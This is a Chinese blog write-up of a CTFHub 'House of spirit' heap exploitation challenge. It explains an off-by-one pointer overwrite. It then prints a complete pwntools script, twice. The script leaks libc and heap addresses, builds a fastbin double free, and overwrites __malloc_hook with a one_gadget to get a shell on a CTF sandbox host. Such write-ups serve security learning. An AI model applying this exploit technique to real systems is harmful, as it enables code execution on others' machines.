[CTFHub-技能树]-----House of spirit

最新推荐文章于 2024-07-22 22:58:19 发布
最新推荐文章于 2024-07-22 22:58:19 发布
阅读量131 收藏
点赞数
分类专栏: PWN 文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128944591
版权

分析

先讲一下漏洞点

这里有个很迷惑的地方就是 read(0, v6, 0x18uLL);,一开始始终没有找到漏洞出现的地方,结果问里一下其他师傅,恍然大悟,我就是傻子。
这里可以向v6中读入0x18个字节的大小。刚好可以覆盖ptr处的低4字节。可以利用这个特点构造double free来进行攻击。

利用

这里只是简单讲一下,一定要动手调试!!!调试!!!调试!!!
先把前面的代码写好

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",32809)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(size,data):
	ru(b"choice:")
	sl(b"1")
	ru(b"size:")
	sl(str(size))
	ru(b"msg:")
	s(data)

def free():
	ru(b"choice:")
	sl(b"2")


def show():
	ru(b"choice:")
	sl(b"3")

这题的ptr只能储存一个chunk的指针,且题目中已经有个0x110大小的chunk,进入了unsorted bins,先申请0x68字节大小的chunk,其会从unsorted bin中分割0x71大小的chunk给我们,利用这个特性可以泄露出libc地址。

add(0x68,b"a"*8)
show()
ru(b"a"*8)
main_arean = uu64(r(6))
libc_base = main_arean-88-0x10-libc.sym['__malloc_hook']-0x100
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x23
gadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base+gadget[3]
print("libc_base---------------------> :",hex(libc_base))
print("fake_chunk--------------------> :",hex(fake_chunk))

之后再泄露heap的地址,其实也可以不用泄露,可以爆破低2字节的16进制数,概率是1/16,但我不想爆破,所以直接泄露heap的地址。

add(0x68,b"aaaa")
free()
add(0x10,b"aaaa")
ru(b"choice:")
s(b"b"*0x14+b"\x10")
free()
add(0x60,b"\x10")
show()
heap_addr = uu64(r(6))-0x10
print("heap_addr------------>: ",hex(heap_addr))
free()
add(0x10,b"aaaa")

offset = int(hex(heap_addr)[10:12],16)
print(hex(offset))

这里利用了fastbin的特性,泄露了fd指针。
之后就可以构造double free了。

ru(b"choice:")
s(b"b"*0x14+b"\x80"+p8(offset))
free()

add(0x60,p64(fake_chunk))
add(0x60,b"a")
add(0x60,b"a"*0x13+p64(one_gadget))
# add(0x60,b"a"*3+p64(0)+p64(one_gadget)+p64(realloc_hook+16))
add(0x60,b"a"*0x13+p64(one_gadget))

ru(b"choice:")
s(b"1")
ru(b"size:")
sl(b"32")

最后的exp为:

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",32809)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(size,data):
	ru(b"choice:")
	sl(b"1")
	ru(b"size:")
	sl(str(size))
	ru(b"msg:")
	s(data)

def free():
	ru(b"choice:")
	sl(b"2")


def show():
	ru(b"choice:")
	sl(b"3")


add(0x68,b"a"*8)
show()
ru(b"a"*8)
main_arean = uu64(r(6))
libc_base = main_arean-88-0x10-libc.sym['__malloc_hook']-0x100
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x23
gadget = [0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base+gadget[3]
print("libc_base---------------------> :",hex(libc_base))
print("fake_chunk--------------------> :",hex(fake_chunk))

add(0x68,b"aaaa")
free()
add(0x10,b"aaaa")
ru(b"choice:")
s(b"b"*0x14+b"\x10")
free()
add(0x60,b"\x10")
show()
heap_addr = uu64(r(6))-0x10
print("heap_addr------------>: ",hex(heap_addr))
free()
add(0x10,b"aaaa")

offset = int(hex(heap_addr)[10:12],16)
print(hex(offset))

ru(b"choice:")
s(b"b"*0x14+b"\x80"+p8(offset))
free()

add(0x60,p64(fake_chunk))
add(0x60,b"a")
add(0x60,b"a"*0x13+p64(one_gadget))
# add(0x60,b"a"*3+p64(0)+p64(one_gadget)+p64(realloc_hook+16))
add(0x60,b"a"*0x13+p64(one_gadget))

ru(b"choice:")
s(b"1")
ru(b"size:")
sl(b"32")


itr()
saulgoodman-q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUGKU] [PWN] PWN5
Stan冲冲冲
05-18 399
[BUGKU] [PWN] PWN5 先下载文件,拉入UBUNTU,checksec检查一下 checksec human 架构是amd64,并开启了NX(堆栈可执行,16进制地址后六位不变,其余运行一次都会变) 在windows里把pwn2拉入64位ida 按F5切换到伪C 发现乱码,修改配置文件后ALT+A全部选上UTF-8,再按一次F5,中文就可以显示了 int __cdecl main(int argc, const char **argv, const char **envp) { char
house-of-spirit-pwn200
csdn546229768的博客
01-11 2560
前言 : 因为期末考试加上复习的原因,接近一个月没有做pwn题了,放寒假就回来在物理机上面装了个ubuntu(折腾了几天,不过装好了做题环境还是挺好用的),打算这个寒假学习完堆知识.来年好好上课(大三压力大!)有空打打比赛. 例题 : lctf2016_pwn200 house-of-spirit 利用条件: (1)想要控制的目标区域的上方空间与下方空间都是可控的内存区域 (2)存在可将堆变量指针覆盖指向为上方可控空间,从而达到将非可控空间与可控空间进行合并变成fake_chunk(有点像unlink) (
scikit-learn初级
weixin_50559423的博客
12-09 7149
s第一章 scikit-learn初级 官网:https://scikit-learn.org/stable/index.html 1.1 Scikit-Learn简介 Scikit-Learn(简称Sklearn)是Python的第三方模块,它是机器学习领域中知名的Python模块之一,它对常用的机器学习算法进行了封装,包括回归(Regression)、降维(Dimensionality Reduction)、分类(Classification)和聚类(Clustering)四大机器学习算法。Scikit
【LLM】self-instruct 构建指令微调数据集
发现问题,并解决问题,批判性思维
07-18 4429
四部曲:指令生成;分类任务识别;实例生成;过滤和后处理。 为了实证评估SELF-INSTRUCT,在GPT3(Brown等人,2020)上运行该框架,在这个模型上的SELF-INSTRUCT迭代过程产出了大约52K条指令,以及大约82K个实例输入和目标输出对。结果数据提供了多种多样的创造性任务,其中50%以上的任务与种子指令的重合度低于0.3 ROUGE-L(§4.2)。可以利用生成的指令数据微调其他大模型。 二、具体过程 1. 指令生成 175个种子任务(每个对应1个指令+1个实例),从该任务池中随机抽取
使用 k-means 聚类算法对多维属性数据进行分类
weixin_44708254的博客
03-17 9348
k-means高维聚类: https://www.cnblogs.com/icydengyw/p/13591990.html
house-hunting-app
05-07
房屋狩猎应用 :house: 房屋搜索应用程序,可方便地访问和出租可用房屋 现场演示 :television: 使用以下凭证: 电子邮件: 密码:123456789 主要问题 :new_moon_face: 大多数打算结婚或正在寻找房屋的人会发现很难...
House-Price-Model-Deployment
05-04
Flask&Heroku房屋价格模型部署 项目链接(与Heroku一起部署): 目标 在此项目中,我们的目标是根据在Deploy环境中提供的字段中输入的信息来估算房屋的价格。 要求 您需要按原样复制或存储库。...
house-agent.rar
03-26
本项目"house-agent.rar"就是一个典型的应用实例,它巧妙地结合了多个技术组件,构建了一个功能完备的房地产中介系统。下面,我们将深入探讨其中涉及的关键技术点。 首先,SpringBoot是Spring框架的简化版本,它...
ddd-house::house: 用 DDD 盖房子
06-29
滴滴之家该存储库用于“用 DDD 建造房屋”。 这是让我了解我最近学习的一些概念的一种方式。 例如以下内容:命令和处理程序命令总线领域事件BDD(使用 Behat 和 PHPSpec)我最大的目标是实现层的分离。...
PHPWind House v1.0 utf-8.zip
07-07
地方网站的盈利点,从行业来说,大概有房产、家装、婚庆交友、美食、母婴、汽车,还有家政、美容、培训等等。我们在去年9月份的时候,就推出了分类信息的功能,其中包括了几大刚性需求,即:房产、婚庆、母婴、美食...
Python如何将字符串连接在一起并使用`join()`方法】
qq_36253366的博客
07-19 426
方法是字符串对象的方法,而不是列表或元组等序列类型的方法。因此,你需要先指定一个用作分隔符的字符串,然后调用这个字符串的。方法将字符串连接在一起,你需要首先确保这些字符串被存储在一个序列类型中(如列表或元组),然后调用这个序列的。方法是一个字符串方法,它用于将序列(如列表、元组等)中的元素以指定的字符连接生成一个新的字符串。列表中的所有字符串元素使用空格作为分隔符连接成一个新的字符串。方法,并将你想要作为分隔符的字符串作为参数传递给。方法,并将包含要连接字符串的序列作为参数传递。
Python 中的内存管理有哪些优缺点】
qq_36253366的博客
07-19 424
Python中的内存管理是一个复杂而高效的系统,它通过自动化和抽象化的方式极大地简化了程序员的内存管理负担,但同时也存在一些潜在的缺点。
批量下载网易云音乐歌单的Python脚本
qq_43580271的博客
07-17 1314
同时,这也展示了如何利用Python在日常生活中解决实际问题的能力,希望这个小技巧对你有所帮助!
N7翻译实战
tjl521314_21的博客
07-17 332
本周完成项目实战用于训练一个简单的序列到序列(seq2seq)模型以实现英语到法语的翻译。数据预处理、模型构建、训练以及可视化损失的过程。本周学习了构建和训练一个简单的seq2seq模型用于英语到法语的翻译,对前面的知识做了一个综合的运用。
python训练模型报错:BrokenPipeError: [Errno 32] Broken pipe
Dxy1239310216的博客
07-18 535
如果问题持续存在,并且你的项目不是必须在 Windows 上运行,考虑在 Unix/Linux 系统上运行你的代码。确保在数据加载器中使用的任何自定义函数或类都是可序列化的,因为多进程需要能够在不同进程间传递它们。进行多进程数据加载时尤其常见,尤其是在 Windows 系统上,因为 Windows 对多进程的支持与 Unix/Linux 系统有所不同。有时候,错误可能是由其他部分的代码引起的,而不是直接由数据加载器引起。如果问题依然存在,你可能需要更详细地检查你的代码或寻求更专业的帮助。
python实现图像缩放算法
qq_42568323的博客
07-20 322
它通过选择离目标像素最近的原始像素的颜色值来确定目标像素的颜色值。它通过考虑目标像素周围16个像素的颜色值,使用双三次插值公式计算出目标像素的颜色值。相较于双线性插值,双三次插值能生成更平滑、更细腻的图像效果。它通过考虑目标像素周围四个像素的颜色值,使用双线性插值公式计算出目标像素的颜色值。尽管最近邻插值在某些应用场景中足够使用,但在需要更高质量图像的场景中,通常会选择更加复杂的插值方法,如双线性插值或双三次插值。双三次插值是图像缩放中高质量的方法之一,适合需要高质量图像处理的应用场景。
Java实现拼图小游戏
最新发布
Aishangyuwen的博客
07-22 815
Java实现拼图小游戏
Django cursor()增删改查和shell环境执行脚本
人生苦短,何妨一试
07-21 356
在Django中,cursor()方法是DatabaseWrapper对象(由django.db.connectio提供)的一个方法,用于创建一个游标对象。这个游标对象可以用来执行SQL命令,从而实现对数据库的增删改查操作。使用cursor.execute()方法执行SQL查询语句,可以获取数据库中的数据。查询your_table表中的所有记录。执行查询后,你可以使用cursor.fetchall()或cursor.fetchone()等方法来获取查询结果。
Leetcode 238. 除自身以外数组的乘积
waterHBO的博客
07-19 331
2 种写法。python 和 C语言
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值